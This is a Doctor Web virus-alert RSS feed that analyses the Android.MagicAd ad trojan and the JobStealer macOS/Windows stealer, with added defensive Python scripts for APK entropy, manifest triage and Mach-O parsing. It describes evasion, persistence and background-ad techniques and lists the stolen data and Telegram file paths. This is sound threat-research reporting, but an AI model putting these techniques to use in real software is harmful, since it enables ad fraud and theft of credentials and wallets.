<?xml version="1.0"?>
<rss version="2.0"><channel><title>Virus alerts</title><link>https://news.drweb.com/news/</link><description>Doctor Web news - Virus alerts</description><image><url>https://st.drweb.com/static/drweb_logo_en.gif</url><link>https://news.drweb.com/news/</link><title>Dr.Web anti-virus</title></image><item><guid>https://news.drweb.com/show/?i=15262&amp;lng=en</guid><title>Android.MagicAd trojan displays ads despite all restrictions</title><link>https://news.drweb.com/show/?i=15262&amp;lng=en&amp;c=9</link><pubDate>Thu, 04 Jun 2026 03:00:00 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;Doctor Web’s experts have discovered Android.MagicAd, a trojan that bypasses Android OS restrictions in several ways in order to display ads in the background. One of these methods is universal, while the others are tailored to devices from specific manufacturers; they include abusing third-party software preinstalled on those devices and using the system media player.&lt;/newslead&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.MagicAd.1&amp;lng=en"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; was distributed via GetApps, the official app catalog for Xiaomi devices, concealed in more than 50 games and other apps. Each of them stayed in the store only briefly, usually for up to a month, after which it disappeared and was replaced by new ones. The threat actors may have been rotating apps this way to delay detection of &lt;a href="https://vms.drweb.com/search/?q=Android.MagicAd.1&amp;lng=en"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; while keeping it active: once an app is pulled from the store, copies already installed remain on users’ devices and continue their malicious activity. At the time of writing, none of the apps we identified as carrying &lt;a href="https://vms.drweb.com/search/?q=Android.MagicAd.1&amp;lng=en"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; are available in the GetApps catalog, and the developers who were distributing them have stopped adding new apps containing the trojan.&lt;/p&gt;

&lt;p&gt;A study conducted by Doctor Web malware analysts showed that the first versions of &lt;a href="https://vms.drweb.com/search/?q=Android.MagicAd.1&amp;lng=en"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; emerged in 2025, and that in addition to the GetApps catalog, they were also encountered in the Samsung Galaxy Store.&lt;/p&gt;

&lt;div class="img img-two"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/may/android_magic_ad/01_Android.MagicAd_store_1.png" data-fancybox=""&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/may/android_magic_ad/01_Android.MagicAd_store_1.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/may/android_magic_ad/02_Android.MagicAd_store_2.png" data-fancybox=""&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/may/android_magic_ad/02_Android.MagicAd_store_2.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;i&gt;Examples of games and programs from the GetApps catalog in which Android.MagicAd.1 was concealed. At the time of this news release, these and other trojan modifications were unavailable for download&lt;/i&gt;&lt;/p&gt;

&lt;p&gt;Part of &lt;a href="https://vms.drweb.com/search/?q=Android.MagicAd.1&amp;lng=en"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt;’s malicious functionality lives in dex files hidden inside encrypted native libraries, which are stored in the app’s resource directory. At run time the trojan decrypts these libraries, extracts its components from them and loads them.&lt;/p&gt;
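&lt;p&gt;One way to spot such payloads without running the app is to look for resource files whose byte distribution looks like ciphertext. The Python script below is an added example written for this article, not code from Doctor Web or from the trojan; it assumes the payloads sit under res/raw/ or assets/ (where an APK keeps opaque resources) and builds a small constructed APK in memory so that it runs offline. Point scan_apk() at a real .apk to use it for triage.&lt;/p&gt;

```python
"""Flag high-entropy files in an APK's res/raw/ and assets/ directories.

Added example for this article, not code from Doctor Web or from the
trojan itself. build_sample_apk() produces constructed sample data, not a
real Android.MagicAd.1 package, so the script runs offline.
"""
import io
import math
import os
import zipfile
from collections import Counter

# Directories where an APK may legitimately keep opaque binary files and where
# the article reports the encrypted libraries being stored.
PAYLOAD_DIRS = ("res/raw/", "assets/")
ENTROPY_THRESHOLD = 7.5   # bits per byte; ciphertext and good compression sit close to 8
MIN_SIZE = 4096           # ignore tiny files, where entropy estimates are noisy
# Containers with a recognisable header are probably what they claim to be.
KNOWN_MAGIC = (b"\x7fELF", b"dex\n", b"PK\x03\x04", b"\x89PNG", b"OggS", b"RIFF", b"ID3")


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy of a byte string in bits per byte (0.0 for empty input)."""
    if not data:
        return 0.0
    total = len(data)
    return -sum((c / total) * math.log2(c / total) for c in Counter(data).values())


def scan_apk_bytes(apk: bytes) -> list:
    """Return [(path, size, entropy)] for suspicious entries of an APK (a ZIP file)."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(apk)) as zf:
        for info in zf.infolist():
            if info.is_dir() or not info.filename.startswith(PAYLOAD_DIRS):
                continue
            if MIN_SIZE > info.file_size:
                continue
            data = zf.read(info)
            ent = shannon_entropy(data)
            has_known_magic = any(data.startswith(m) for m in KNOWN_MAGIC)
            if ent >= ENTROPY_THRESHOLD and not has_known_magic:
                hits.append((info.filename, info.file_size, round(ent, 2)))
    return hits


def scan_apk(path: str) -> list:
    """Convenience wrapper for an APK on disk."""
    with open(path, "rb") as fh:
        return scan_apk_bytes(fh.read())


def build_sample_apk() -> bytes:
    """Constructed stand-in for an APK: plausible resources plus one 'encrypted' blob."""
    noise = os.urandom  # ciphertext is indistinguishable from random bytes, so this stands in for it
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr("AndroidManifest.xml", b"binary xml placeholder" * 50)
        zf.writestr("res/raw/strings.txt", b"hello world\n" * 1000)        # low-entropy text
        zf.writestr("res/raw/libhelper.bin", noise(64 * 1024))             # headerless noise: the hit
        zf.writestr("lib/arm64-v8a/libreal.so", b"\x7fELF" + noise(8192))  # normal place for a library; not scanned
    return buf.getvalue()


if __name__ == "__main__":
    for name, size, ent in scan_apk_bytes(build_sample_apk()):
        print(f"{name}: {size} bytes, entropy {ent}")
```

&lt;p&gt;Compressed audio and images also approach 8 bits per byte, which is why the script skips files with a recognisable container header; a hit is a prompt for manual inspection of the file, not a verdict on its own.&lt;/p&gt;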

&lt;p&gt;Before displaying any ads, the trojan runs a number of checks to make sure it is not being analysed. For example, it looks for signs that it is running in a virtual machine, verifies whether its installation was organic, checks whether the infected device’s IP address is on the malware’s own blacklist, and so on.&lt;/p&gt;

&lt;p&gt;If &lt;a href="https://vms.drweb.com/search/?q=Android.MagicAd.1&amp;lng=en"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; finds nothing suspicious, it hides its icon from the app list in the launcher. Next, it creates a notification channel and uses it to launch several persistence services that keep the trojan working in the background after its window is closed (on current Android versions a service that is to survive in the background must run in the foreground with a visible notification, which in turn requires a notification channel). After that, using the system job scheduler, &lt;a href="https://vms.drweb.com/search/?q=Android.MagicAd.1&amp;lng=en"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; schedules a periodic task that restarts these services; the services check that the notification channel is still working and recreate it if necessary. In addition, on devices with relatively old Android versions, the trojan creates a virtual display so that the system does not stop one of its components.&lt;/p&gt;

&lt;p&gt;To display ads in the background after its window has been closed, &lt;a href="https://vms.drweb.com/search/?q=Android.MagicAd.1&amp;lng=en"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; uses one of several techniques, chosen according to the manufacturer of the infected device. None of them requires the &lt;span class="string"&gt;SYSTEM_ALERT_WINDOW&lt;/span&gt; permission, which normally has to be granted explicitly by the user before an app may draw on top of other apps’ windows, and the trojan never requests it.&lt;/p&gt;

&lt;p&gt;Whichever technique is used, every ad banner is loaded in a translucent Activity, which lets the trojan draw it over whatever is currently on screen.&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/may/android_magic_ad/03_Android.MagicAd_banner1.png" data-fancybox=""&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/may/android_magic_ad/03_Android.MagicAd_banner1.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/may/android_magic_ad/04_Android.MagicAd_banner2.png" data-fancybox=""&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/may/android_magic_ad/04_Android.MagicAd_banner2.1.png" alt="#drweb"&gt;
    &lt;/a&gt;

    &lt;a href="https://st.drweb.com/static/new-www/news/2026/may/android_magic_ad/05_Android.MagicAd_banner3.png" data-fancybox=""&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/may/android_magic_ad/05_Android.MagicAd_banner3.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/may/android_magic_ad/06_Android.MagicAd_banner4.png" data-fancybox=""&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/may/android_magic_ad/06_Android.MagicAd_banner4.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p class="text-center"&gt;&lt;i&gt;Examples of ads displayed by Android.MagicAd.1&lt;/i&gt;&lt;/p&gt;

&lt;p&gt;One technique relies on intents addressed to other apps. It lets the trojan get around the restriction in modern Android versions that stops apps from starting activities from the background. Depending on the model of the infected device, &lt;a href="https://vms.drweb.com/search/?q=Android.MagicAd.1&amp;lng=en"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; uses it either to display ads itself or to make the target apps show the ad banners directly.&lt;/p&gt;

&lt;p&gt;In one variation of this method, the trojan targets the following programs:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;
        Mi Browser on Xiaomi devices;
    &lt;/li&gt;
    &lt;li&gt;
        Miui SystemUI graphical shell on Xiaomi devices; and
    &lt;/li&gt;
    &lt;li&gt;
        Amazon Fire TV Home Screen launcher on Amazon Fire TV devices.
    &lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;All of these are system apps on their respective devices, so they can process intents even when the user has not launched them. As long as they are active and able to receive intents, &lt;a href="https://vms.drweb.com/search/?q=Android.MagicAd.1&amp;lng=en"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; can use them to display ads.&lt;/p&gt;

&lt;p&gt;It is worth noting that if Mi Browser is installed on a Xiaomi device as a non-system program, the trojan can also use it to show ads—until the browser window is closed.&lt;/p&gt;

&lt;p&gt;When &lt;a href="https://vms.drweb.com/search/?q=Android.MagicAd.1&amp;lng=en"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; detects Mi Browser on a suitable device, it passes its dex component (detected by Dr.Web as &lt;a href="https://vms.drweb.com/search/?q=Android.MagicAd.1.origin&amp;lng=en"&gt;&lt;b&gt;Android.MagicAd.1.origin&lt;/b&gt;&lt;/a&gt;) a PendingIntent that launches the ad. The module wraps it in an intent of its own and sends that to the browser; the browser extracts the original intent and launches the corresponding ad on the trojan’s behalf.&lt;/p&gt;

&lt;p&gt;The interaction with the other two target apps differs slightly, as they are used to wake the trojan from the background. First, &lt;a href="https://vms.drweb.com/search/?q=Android.MagicAd.1&amp;lng=en"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; passes its dex component a PendingIntent that launches the ad; the module then sends its own intent to the target app so that the latter wakes it up. If the target is Miui SystemUI, it responds by sending an intent of its own that wakes the module. If the target is Amazon Fire TV Home Screen, it launches the module directly, by the module’s package name. Once the &lt;a href="https://vms.drweb.com/search/?q=Android.MagicAd.1.origin&amp;lng=en"&gt;&lt;b&gt;Android.MagicAd.1.origin&lt;/b&gt;&lt;/a&gt; module gains control, it launches the ad from the PendingIntent it received from the main malicious app.&lt;/p&gt;

&lt;p&gt;If the trojan fails to display the ad, it retries this method twice more; if that also fails, it tries to display the ad directly, without pending intents or its malicious dex module.&lt;/p&gt;

&lt;p&gt;Another variant of this method resembles the previous one and abuses apps on Vivo devices. It differs in that the ads are launched with the help of Binder, the Android inter-process communication mechanism. The trojan targets the following system apps:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;
        iManager;
    &lt;/li&gt;
    &lt;li&gt;
        Phonebook;
    &lt;/li&gt;
    &lt;li&gt;
        Vivo Browser; and
    &lt;/li&gt;
    &lt;li&gt;
        Baidu IME Customized.
    &lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.MagicAd.1&amp;lng=en"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; launches these apps over Binder by sending them ordinary intents packed into a Parcel, the data container used for Binder calls. The apps then launch the &lt;a href="https://vms.drweb.com/search/?q=Android.MagicAd.1.origin&amp;lng=en"&gt;&lt;b&gt;Android.MagicAd.1.origin&lt;/b&gt;&lt;/a&gt; component from the background, and it displays the ad.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.MagicAd.1&amp;lng=en"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; has several other methods for displaying ads while running in the background; one of them uses the media player. Unlike the manufacturer-specific techniques, this method is universal and works on most Android device models regardless of vendor. &lt;a href="https://vms.drweb.com/search/?q=Android.MagicAd.1&amp;lng=en"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; decrypts an audio file from its body and saves it to its working directory. Next, it starts an instance of the system media player, sets its volume to the minimum, and links the player with the Android global media control system. To launch an ad, &lt;a href="https://vms.drweb.com/search/?q=Android.MagicAd.1&amp;lng=en"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; then registers a broadcast receiver that monitors button presses in this player, uses a special adb command to simulate the user pressing the player’s record button, and immediately closes the player’s window. The button press is delivered to the system media-button receiver, which hands control to &lt;a href="https://vms.drweb.com/search/?q=Android.MagicAd.1&amp;lng=en"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; so that it can launch the ad.&lt;/p&gt;
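&lt;p&gt;Several of the behaviours described above leave traces in the app’s manifest: the translucent ad activities, the services kept alive behind a notification, the job-scheduler restart task, the media-button receiver used by the media-player technique, and the absence of any request for SYSTEM_ALERT_WINDOW. The Python triage script below is an added example written for this article, not Doctor Web’s or the trojan’s code. It assumes the manifest has already been decoded from Android binary XML to plain XML (for instance with apktool), and the sample manifest it scans is constructed in code, not taken from a real Android.MagicAd.1 package.&lt;/p&gt;

```python
"""Static triage of a decoded AndroidManifest.xml for the background-ad
pattern described in the article.

Added example, not Doctor Web's or the trojan's code. It expects plain XML
(decoded from binary XML with apktool or similar); build_sample_manifest()
is a constructed manifest, not one taken from a real sample.
"""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"


def a(name: str) -> str:
    """Fully qualified android: attribute name as ElementTree expects it."""
    return "{%s}%s" % (ANDROID_NS, name)


def triage_manifest(root: ET.Element) -> dict:
    """Map each indicator family to the component names (or permissions) that matched."""
    findings = {
        "translucent_activities": [],
        "foreground_services": [],
        "job_services": [],
        "media_button_receivers": [],
        "overlay_without_permission": [],
    }
    perms = {p.get(a("name")) for p in root.iter("uses-permission")}
    app = root.find("application")
    if app is None:
        return findings
    for act in app.iter("activity"):
        if "Translucent" in act.get(a("theme"), ""):
            findings["translucent_activities"].append(act.get(a("name")))
    for svc in app.iter("service"):
        name = svc.get(a("name"))
        # foregroundServiceType is only mandatory when targeting Android 14 or later,
        # so its absence proves nothing; its presence marks a foreground service.
        if svc.get(a("foregroundServiceType")) is not None:
            findings["foreground_services"].append(name)
        # JobScheduler jobs run in a service protected by BIND_JOB_SERVICE.
        if svc.get(a("permission")) == "android.permission.BIND_JOB_SERVICE":
            findings["job_services"].append(name)
    for rcv in app.iter("receiver"):
        actions = {x.get(a("name")) for x in rcv.iter("action")}
        if "android.intent.action.MEDIA_BUTTON" in actions:
            findings["media_button_receivers"].append(rcv.get(a("name")))
    # Translucent activities without SYSTEM_ALERT_WINDOW is the article's
    # "ads over other apps without the overlay permission" pattern.
    if findings["translucent_activities"] and "android.permission.SYSTEM_ALERT_WINDOW" not in perms:
        findings["overlay_without_permission"] = list(findings["translucent_activities"])
    return findings


def risk_score(findings: dict) -> int:
    """Number of distinct indicator families present; 4 or more deserves a manual look."""
    return sum(1 for v in findings.values() if v)


def triage_file(path: str) -> dict:
    """Triage a decoded AndroidManifest.xml on disk."""
    return triage_manifest(ET.parse(path).getroot())


def build_sample_manifest() -> ET.Element:
    """Constructed manifest exhibiting the full pattern (not from a real sample)."""
    root = ET.Element("manifest", {"package": "com.example.game"})
    for p in ("android.permission.INTERNET", "android.permission.FOREGROUND_SERVICE"):
        ET.SubElement(root, "uses-permission", {a("name"): p})
    app = ET.SubElement(root, "application")
    ET.SubElement(app, "activity", {a("name"): ".MainActivity"})
    ET.SubElement(app, "activity", {a("name"): ".AdActivity",
                                    a("theme"): "@android:style/Theme.Translucent.NoTitleBar"})
    ET.SubElement(app, "service", {a("name"): ".KeepAliveService",
                                   a("foregroundServiceType"): "mediaPlayback"})
    ET.SubElement(app, "service", {a("name"): ".RestartJob",
                                   a("permission"): "android.permission.BIND_JOB_SERVICE"})
    rcv = ET.SubElement(app, "receiver", {a("name"): ".MediaButtonReceiver"})
    flt = ET.SubElement(rcv, "intent-filter")
    ET.SubElement(flt, "action", {a("name"): "android.intent.action.MEDIA_BUTTON"})
    return root


if __name__ == "__main__":
    result = triage_manifest(build_sample_manifest())
    for key, value in result.items():
        print(f"{key}: {value}")
    print("indicator families:", risk_score(result))
```

&lt;p&gt;The checks are heuristics: plenty of legitimate apps declare a translucent activity or a media-button receiver, so it is the combination of families, together with runtime behaviour such as the hidden launcher icon, that should prompt a closer look rather than any single match.&lt;/p&gt;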

&lt;p&gt;Dr.Web Security Space for mobile devices reliably detects and removes all known versions of the &lt;a href="https://vms.drweb.com/search/?q=Android.MagicAd.1&amp;lng=en"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; malware, keeping our users well protected from this threat.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Android.MagicAd.1/README.adoc" target="_blank" rel="noopener"&gt;Indicators of compromise&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;More details about &lt;a href="https://vms.drweb.com/search/?q=Android.MagicAd.1&amp;lng=en"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;More details about &lt;a href="https://vms.drweb.com/search/?q=Android.MagicAd.1.origin&amp;lng=en"&gt;&lt;b&gt;Android.MagicAd.1.origin&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb.com/show/?i=15253&amp;lng=en</guid><title>Instead of a job—stolen data and money. Trojan stealer targeting macOS and Windows users conceals itself in fake online interview apps</title><link>https://news.drweb.com/show/?i=15253&amp;lng=en&amp;c=9</link><pubDate>Thu, 07 May 2026 14:41:46 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;&lt;strong&gt;Doctor Web’s experts are warning users about the spread of JobStealer, a trojan app that steals confidential information from macOS and Windows computer users. It primarily aims to hijack data from crypto wallets. Fraudsters, under the pretext of conducting online interviews, lure potential victims to malicious websites and ask them to download a video conferencing app. In reality, this software is the JobStealer trojan.&lt;/strong&gt;&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;The attack begins with the threat actors contacting potential victims and offering them a particular job vacancy. They invite users to a job interview and provide them with links to websites for the online meeting “platforms”—supposedly to connect to a video conference. These websites look presentable but are actually fraudulent. The malicious program JobStealer, disguised as an online conferencing app, is downloaded from them. Cybercriminals use different designs for these Internet resources and also change the names of the “software”. Our specialists identified variants called MeetLab, Juseo, Meetix, Carolla, and others. 
In some cases, the attackers use names of real services, like Webex.&lt;/p&gt;&lt;div class="img img-two-v same-height"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/01_JobStealer.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/01_JobStealer.1.png" alt="#drweb"&gt; &lt;/a&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/02_JobStealer.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/02_JobStealer.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Examples of websites for fake online conferencing services from which JobStealer is downloaded&lt;/i&gt;&lt;/p&gt;&lt;p&gt;To convince users that these platforms are fully functional, scammers create corresponding Telegram channels and social media accounts—for example, on X.&lt;/p&gt;&lt;div class="img img-two-v same-height"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/03_JobStealer.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/03_JobStealer.1.png" alt="#drweb"&gt; &lt;/a&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/04_JobStealer.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/04_JobStealer.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;To disguise the trojan as a legitimate piece of software, threat actors create the appearance of activity on social networks&lt;/i&gt;&lt;/p&gt;&lt;p&gt;To install the app on devices running macOS, visitors to malicious websites are provided with two options:&lt;/p&gt;&lt;ul class="list"&gt;&lt;li&gt;copy the bash command listed on the website and run it in the terminal;&lt;/li&gt;&lt;li&gt;download a disk image file in the 
&lt;span class="string"&gt;.dmg&lt;/span&gt; format and launch it.&lt;/li&gt;&lt;/ul&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/05_JobStealer.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/05_JobStealer.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;The JobStealer trojan is downloaded from malicious websites both in the form of a dmg container and by running a bash command in the terminal&lt;/i&gt;&lt;/p&gt;&lt;p&gt;In the first case, when a command is executed in the terminal, a script is automatically downloaded from the Internet and then executed. This script downloads and runs the JobStealer’s executable file (detected as&amp;nbsp;&lt;a href="https://vms.drweb.com/search/?q=Mac.PWS.JobStealer.1&amp;lng=en"&gt;&lt;b&gt;Mac.PWS.JobStealer.1&lt;/b&gt;&lt;/a&gt;).&lt;/p&gt;&lt;p&gt;In the second case, the dmg image offered for download initially contains the abovementioned files. When mounted, it displays instructions on how to “install” the app. These instructions state that the user needs to open the terminal and drag the provided script into its window. 
In fact, instead of the video conferencing app getting installed, the script launches the trojan file.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/06_JobStealer.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/06_JobStealer.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;An image with the instructions that are displayed when the disk image file containing the JobStealer trojan is opened&lt;/i&gt;&lt;/p&gt;&lt;p&gt;&lt;a href="https://vms.drweb.com/search/?q=Mac.PWS.JobStealer.1&amp;lng=en"&gt;&lt;b&gt;Mac.PWS.JobStealer.1&lt;/b&gt;&lt;/a&gt;&amp;nbsp;is a Fat (universal) Mach-O executable that contains code for two processor architectures, x86_64 and arm64. When the trojan is launched, the system loader automatically selects the slice that matches the computer’s CPU.&lt;/p&gt;&lt;p&gt;Several versions of&amp;nbsp;&lt;a href="https://vms.drweb.com/search/?q=Mac.PWS.JobStealer.1&amp;lng=en"&gt;&lt;b&gt;Mac.PWS.JobStealer.1&lt;/b&gt;&lt;/a&gt;&amp;nbsp;exist. The earliest variants did not run on arm64 (Apple silicon) Macs. They also lacked obfuscation, which the trojan’s creators began adding and strengthening in later updates of the stealer.&lt;/p&gt;&lt;p&gt;When launched,&amp;nbsp;&lt;a href="https://vms.drweb.com/search/?q=Mac.PWS.JobStealer.1&amp;lng=en"&gt;&lt;b&gt;Mac.PWS.JobStealer.1&lt;/b&gt;&lt;/a&gt;&amp;nbsp;displays a phishing window that alerts users about an alleged error in the app’s operation. To “fix” this error, the malicious program asks the user to enter their account password.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/07_JobStealer_app_error.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/07_JobStealer_app_error.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;A phishing window asking for a Mac user account password&lt;/i&gt;&lt;/p&gt;&lt;p&gt;Next,&amp;nbsp;&lt;a href="https://vms.drweb.com/search/?q=Mac.PWS.JobStealer.1&amp;lng=en"&gt;&lt;b&gt;Mac.PWS.JobStealer.1&lt;/b&gt;&lt;/a&gt;&amp;nbsp;collects the following data:&lt;/p&gt;&lt;ul class="list"&gt;&lt;li&gt;operating system version and computer ID;&lt;/li&gt;&lt;li&gt;data from about 300 crypto wallet browser extensions installed in target Chromium-based browsers (Chrome, Opera, Brave, OperaGX, Vivaldi, Edge, Arc, and CocCoc);&lt;/li&gt;&lt;li&gt;cookie files from these browsers;&lt;/li&gt;&lt;li&gt;passwords and bank card details saved in the browsers’ autofill data;&lt;/li&gt;&lt;li&gt;Telegram messenger files from the directories &lt;span class="string"&gt;/Library/Application Support/Telegram Desktop/tdata&lt;/span&gt; and &lt;span class="string"&gt;/Documents/temp_data/Apps/Telegram&lt;/span&gt;, where session authorization keys, downloaded files, etc., are stored;&lt;/li&gt;&lt;li&gt;user notes from the native macOS Notes application;&lt;/li&gt;&lt;li&gt;evidence that the crypto wallets Ledger Live and Trezor Suite are present in the system.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;This data is packed into a ZIP archive and uploaded to the C2 server.&lt;/p&gt;&lt;p&gt;The malware’s creators have also prepared a version of JobStealer for computers running Windows; its functionality is similar to that of the macOS version.&lt;/p&gt;&lt;p&gt;
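&lt;p&gt;The Fat Mach-O layout of the macOS binary described above can be checked without executing the sample, and because the earliest variants lacked an arm64 slice, the architecture list is also a quick way to tell old builds from newer ones. The Python parser below is an added example written for this article, not Doctor Web’s or the stealer’s code; the three inputs it inspects are constructed in code (a fat container with x86_64 and arm64 slices like the one described, a single-architecture binary, and a Java class file, which shares the fat magic number and is the classic false positive), not bytes from a real sample.&lt;/p&gt;

```python
"""List the CPU architectures inside a Mach-O file by parsing its header.

Added example for this article, not code from Doctor Web or from the
JobStealer sample. The SAMPLE_* inputs are constructed here, not taken
from a real binary.
"""
import struct

FAT_MAGIC = 0xCAFEBABE      # fat header, big-endian, 32-bit slice offsets
FAT_MAGIC_64 = 0xCAFEBABF   # fat header with 64-bit slice offsets
MH_MAGIC_64 = 0xFEEDFACF    # thin 64-bit Mach-O, stored in the CPU's (little) endianness
MH_MAGIC = 0xFEEDFACE       # thin 32-bit Mach-O

CPU_ARCH_ABI64 = 0x01000000
CPU_TYPE_NAMES = {
    7: "i386",
    7 | CPU_ARCH_ABI64: "x86_64",
    12: "arm",
    12 | CPU_ARCH_ABI64: "arm64",
}


def cpu_name(cputype: int) -> str:
    return CPU_TYPE_NAMES.get(cputype, "cputype %d" % cputype)


def macho_architectures(data: bytes) -> list:
    """Architectures in a Mach-O blob: one for a thin file, one per slice for a
    fat file. Raises ValueError if the data is not a well-formed Mach-O header."""
    if 8 > len(data):
        raise ValueError("too short to be Mach-O")
    magic_be = int.from_bytes(data[:4], "big")
    magic_le = int.from_bytes(data[:4], "little")
    if magic_le in (MH_MAGIC_64, MH_MAGIC):
        # struct mach_header(_64): magic, cputype, cpusubtype, filetype, ...
        return [cpu_name(int.from_bytes(data[4:8], "little"))]
    if magic_be not in (FAT_MAGIC, FAT_MAGIC_64):
        raise ValueError("unknown magic 0x%08x" % magic_be)
    nfat = int.from_bytes(data[4:8], "big")
    if nfat == 0:
        raise ValueError("fat header with no slices")
    # struct fat_arch: cputype, cpusubtype, offset, size, align (+ reserved in fat_arch_64)
    entry_fmt = ">iiQQII" if magic_be == FAT_MAGIC_64 else ">iiIII"
    entry_size = struct.calcsize(entry_fmt)
    archs = []
    for i in range(nfat):
        start = 8 + i * entry_size
        if start + entry_size > len(data):
            raise ValueError("fat_arch table runs past the end of the file")
        cputype, _subtype, offset, size = struct.unpack_from(entry_fmt, data, start)[:4]
        # A Java class file also starts with 0xCAFEBABE, with its version number
        # where nfat_arch would be; its "slices" never fit inside the file.
        if size == 0 or offset + size > len(data):
            raise ValueError("fat slice %d lies outside the file" % i)
        archs.append(cpu_name(cputype))
    return archs


def describe(data: bytes) -> str:
    """One-line summary such as 'fat: x86_64, arm64', 'thin: x86_64' or 'not Mach-O: ...'."""
    try:
        archs = macho_architectures(data)
    except ValueError as exc:
        return "not Mach-O: %s" % exc
    is_fat = int.from_bytes(data[:4], "big") in (FAT_MAGIC, FAT_MAGIC_64)
    return "%s: %s" % ("fat" if is_fat else "thin", ", ".join(archs))


def _thin_macho(cputype: int) -> bytes:
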